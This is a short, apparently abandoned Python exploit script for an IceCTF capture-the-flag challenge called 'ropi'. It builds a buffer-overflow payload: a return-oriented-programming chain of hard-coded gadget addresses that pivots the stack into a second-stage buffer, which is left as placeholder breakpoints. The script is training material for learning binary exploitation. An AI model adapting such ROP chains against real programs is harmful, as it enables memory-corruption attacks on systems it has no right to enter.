icectf-ropi-aborted.py

#!/usr/bin/python

import struct

ROP_REP = struct.pack("<L",0x0804847a)
ROP_POP_EBX = struct.pack("<L",0x08048395)
ROP_BREAK = struct.pack("<L",0xCCCCCCCC)
ROP_READ_FLAG = struct.pack("<L",0x08048569) # RET
ROP_READFD_FLAG_ARG2= struct.pack("<L",0x78563412)
ROP_READ_FLAG_ARG = struct.pack("<L",0xBADBEEEF)
ROP_READFD_FLAG = struct.pack("<L",0x080485C4) # ORI
ROP_READFD_FLAG_ARG = struct.pack("<L",0x0ABCDEFFF)
ROP_PRINT_FLAG = struct.pack("<L",0x0804862C) # PRO
ROP_POPPOPRET = struct.pack("<L",0x080486ee)
ROP_GOBACKWARDS = struct.pack("<L",0x08048515)
ROP_POP3RET = struct.pack("<L",0x080486ED)

# 80483b2

ROP_READ_PLT = struct.pack("<L",0x080483B0)
ROP_LEAVE_RET = struct.pack("<L",0x08048567)

ROP_STAGE2_SHELLCODE = struct.pack("<L",0x0804A080 + 0x40)

# stage 1 shellcode - read onto stack

out = "\xCC" * 40
out += ROP_STAGE2_SHELLCODE  # set EBP to stage2
out += ROP_READ_PLT          # read(0,stage2,0xFF)
out += ROP_LEAVE_RET         # leave,ret (esp becomes stage2, pop ebp, ret)
out += struct.pack("<L",0)
out += ROP_STAGE2_SHELLCODE  # offset of dat, size 0x7F
out += struct.pack("<L",0xFF)

# stage 2 shellcode - read into flag+40 (total space 40)

out += "\xAA\xAA\xAA\xAA"            # buffer - don't care what ebp is
# out += struct.pack("<L",0x08048569)  # "ret" function (but this doesn't work)
out += ROP_BREAK
out += ROP_BREAK
out += ROP_BREAK
# out += ROP_READ_FLAG_ARG
print out,